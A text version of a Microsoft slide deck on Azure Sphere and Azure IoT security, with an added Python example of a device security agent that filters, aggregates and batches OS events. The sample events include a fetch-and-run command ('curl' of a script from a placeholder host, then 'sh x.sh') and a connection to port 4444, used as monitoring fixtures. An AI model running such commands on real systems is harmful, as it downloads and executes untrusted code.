Microsoft Azure IoT Security for IoT, ALGYAN Tech Seminar 2020/2/6
1. Security of Azure Sphere
• Microsoft Corporation
• Global Black Belt IoT Technical Specialist
• 太田 寛
• Twitter: @embedded_george
2. A long history of trustworthy computing
• Microsoft has more than 25 years of experience protecting customers and their devices.
• Microsoft milestones on the timeline: First Microsoft Datacenter; Trustworthy Computing Initiative; Security Development Lifecycle; Malware Protection Center; Microsoft Security Response Center; Digital Crimes Unit; Operations Security Assurance.
• Industry events on the same timeline: the first documented ransomware attack; the first internet virus spreads malicious Kaos code; the first AOL Trojan appears; introduction of the phrase "The Internet of Things"; DoS attacks shut down Yahoo!, Buy.com, Amazon, eBay and CNN; Cabir, the first mobile device worm, is developed; the first reported ransomware attack on connected devices; Azure Sphere launched.
• Years marked on the timeline: 1989, 1994, 1995, 1998, 1999, 2004, 2005, 2007, 2014, 2017, 2018.
5. The 7 properties of highly secured devices
https://aka.ms/7properties
• The seven properties published at that link are: a hardware-based root of trust; a small trusted computing base; defense in depth; compartmentalization; certificate-based authentication; renewable security; and failure reporting.
6. Azure Sphere
• Azure Sphere Certified MCUs
• The Azure Sphere Operating System
• The Azure Sphere Security Service
Azure Sphere is an end-to-end solution for securing MCU-powered devices.
7. Azure Sphere Certified MCUs
From silicon partners, with built-in Microsoft security technology, these MCUs provide connectivity and a dependable hardware root of trust.
MCU: the hardware layer of the solution
9. The Azure Sphere Operating System
A four-layer defense-in-depth OS with ongoing updates creates a secured platform for IoT experiences. The four layers are the Security Monitor, a custom Linux kernel, on-chip cloud services, and the application containers in which customer code runs.
OS: the software layer of the solution
11. The Azure Sphere Security Service
Guards every Azure Sphere device: it brokers trust for device-to-device and device-to-cloud communication, detects emerging threats, and renews device security.
Cloud: the service layer of the solution
14. The security landscape (on-premises and cloud)
• Increasing complexity
• Evolving threats
• Talent gap
• Rising costs
"By 2021, 25% of the world's personal data will be compromised and housed in a Data Lake analyzed and utilized by consortiums of Threat Actors."*
*Source: IDC FutureScape: Worldwide Security Products and Services
15. Built-in controls
Unmatched security across operations, technology, and partnerships:
• $1B annual investment in cybersecurity
• 3500+ global security experts
• Trillions of diverse signals for unique intelligence
Secure foundation and intelligence, for a heterogeneous world
16. Get secure faster: Azure Security Center
• Strengthen security posture: cloud security posture management, Secure Score, policies and compliance
• Protect against threats: for servers, for cloud-native workloads, for databases and storage
18. IoT Solution: End-to-end Threat Analysis
Attack surfaces traced across the solution in the diagram:
• Communication: the Internet; remote and physical access
• Device: access and execution
• Edge: access and execution
• IoT Hub world: access control, behavior, telemetry, configuration, device admin, admin, C&C (twin), custom endpoints
• Azure: prebuilt, secured services, with ASC-based protection
20. True "end-to-end" security for IoT
• End-to-end solution, from device, to Edge, to IoT Hub
• Visibility into the security posture and state of the Azure IoT solution
• Single pane of glass to manage IoT and hybrid cloud security infrastructure
• End-to-end analysis and management of security posture
• Find, investigate, and respond to the real threats in minutes, without the fatigue of false positives, with Azure Sentinel
• Find and eliminate threats and manage your security posture with Azure Security Center
• Monitor the health of your IoT devices in near real time with Azure IoT Hub
• Block compromised devices with Azure IoT Hub
21. Device security monitoring agent
• Security agents provide in-depth device monitoring and visibility.
• Reference architecture for Linux and Windows security agents for IoT devices, in both C# and C.
• These agents handle raw event collection from the OS, event aggregation to reduce cost, and configuration through the device Security Twin.
• Security messages are sent through the customer's IoT hub into the ASC for IoT analytics service.
• Open source.
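The three agent responsibilities listed above (raw collection, aggregation to reduce cost, and twin-driven configuration) are shown end to end in the following added example, which is not the reference agent's code. It takes constructed raw OS events, reads per-event-type priorities and a message size cap from a twin-style desired-properties document, collapses identical events into one record with a count, and batches the result into a security message per priority. The twin keys (`eventPriority_<EventType>`, `maxMessageSizeInBytes`) and the message fields are modelled on the agent's documented configuration but are assumptions here, not the exact schema.

```python
"""Device security agent pipeline sketch (added example, not the reference agent).

raw OS events -> priority filter from the security twin -> aggregation
(identical events merged and counted) -> one batched message per priority.
Twin keys, message fields and the sample events are constructed/assumed.
"""
import hashlib
import json

# Desired properties as they might arrive in the agent's twin (assumed keys).
TWIN_DESIRED = {
    "highPriorityMessageFrequency": "PT7M",
    "lowPriorityMessageFrequency": "PT5H",
    "maxMessageSizeInBytes": 204800,
    "eventPriority_ListeningPorts": "High",
    "eventPriority_ProcessCreate": "Low",
    "eventPriority_ConnectionCreate": "Off",   # switched off in the twin: never sent
}

# Constructed raw events as an OS collector would hand them over.
RAW_EVENTS = [
    {"Name": "ListeningPorts", "Payload": {"Protocol": "tcp", "LocalPort": "22"}},
    {"Name": "ListeningPorts", "Payload": {"Protocol": "tcp", "LocalPort": "22"}},
    {"Name": "ProcessCreate", "Payload": {"Executable": "/usr/bin/curl",
                                          "CommandLine": "curl http://example.invalid/x.sh"}},
    {"Name": "ProcessCreate", "Payload": {"Executable": "/usr/bin/curl",
                                          "CommandLine": "curl http://example.invalid/x.sh"}},
    {"Name": "ProcessCreate", "Payload": {"Executable": "/bin/sh", "CommandLine": "sh x.sh"}},
    {"Name": "ConnectionCreate", "Payload": {"RemoteAddress": "203.0.113.9", "RemotePort": "4444"}},
    {"Name": "Unknown", "Payload": {}},   # no twin entry for this type
]


def event_priority(name, desired):
    """Priority for an event type from the twin; types the twin does not list are Off."""
    return desired.get("eventPriority_" + name, "Off")


def payload_key(name, payload):
    """Stable key so that byte-identical payloads of one event type collapse together."""
    digest = hashlib.sha256(json.dumps(payload, sort_keys=True).encode("utf-8")).hexdigest()
    return name + ":" + digest


def aggregate(events, desired):
    """Bucket events by priority and merge duplicates into one record with a Count.

    Returns ({"High": [...], "Low": [...]}, dropped) where dropped counts the
    events whose type is Off or unknown to the twin.
    """
    queues = {"High": {}, "Low": {}}
    dropped = 0
    for ev in events:
        prio = event_priority(ev["Name"], desired)
        if prio not in queues:
            dropped += 1
            continue
        key = payload_key(ev["Name"], ev["Payload"])
        entry = queues[prio].setdefault(
            key, {"Name": ev["Name"], "Payload": dict(ev["Payload"]), "Count": 0})
        entry["Count"] += 1
    return {p: list(q.values()) for p, q in queues.items()}, dropped


def build_message(agent_id, priority, events, max_bytes):
    """Pack aggregated events into one message without exceeding the twin's size cap.

    Events that do not fit are left for the next send interval rather than
    producing a message the hub would reject.
    """
    msg = {"AgentId": agent_id, "MessageSchemaVersion": "1.0",
           "Priority": priority, "Events": []}
    for ev in events:
        candidate = dict(msg, Events=msg["Events"] + [ev])
        if len(json.dumps(candidate).encode("utf-8")) > max_bytes:
            break
        msg = candidate
    return msg


def run(raw_events=RAW_EVENTS, desired=TWIN_DESIRED, agent_id="agent-constructed-01"):
    """Full pass: filter, aggregate, and build one message per priority queue."""
    queues, dropped = aggregate(raw_events, desired)
    max_bytes = int(desired.get("maxMessageSizeInBytes", 204800))
    messages = {p: build_message(agent_id, p, evs, max_bytes) for p, evs in queues.items()}
    return {"messages": messages, "dropped": dropped}


if __name__ == "__main__":
    print(json.dumps(run(), indent=2))
```

The cost reduction the slide mentions comes from the two knobs the twin controls: the per-type priority decides whether an event is sent at all and on which cadence, and the size cap bounds every message, so a chatty device cannot turn a burst of identical process-creation events into a matching burst of hub messages.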
22. Securing IoT Edge Devices
• Containerized Edge Agent, deployable automatically on the targeted devices
• MMA and Edge Hub: baselining and detection
• Customized recommendations and alerts
• IoT Edge-based security: a security container running ASC for IoT analytics
Azure IoT Edge architecture (diagram):
• Modules on the edge device: OPC UA module, 3rd-party module, ASA module, Functions module, ASC Edge module
• Edge Hub: store and forward, module communication, and the IoT Hub API toward the cloud
• Edge Agent: module management via module twins (data, config, control)
• IoT Edge Runtime: iotedged on the Docker Engine
• Devices: * devices requiring a module for their protocol (OPC UA); † devices capable of using the IoT Hub SDK directly
• Azure cloud: IoT Hub (twin, DCS), Azure services (ASA, Functions), and the customer application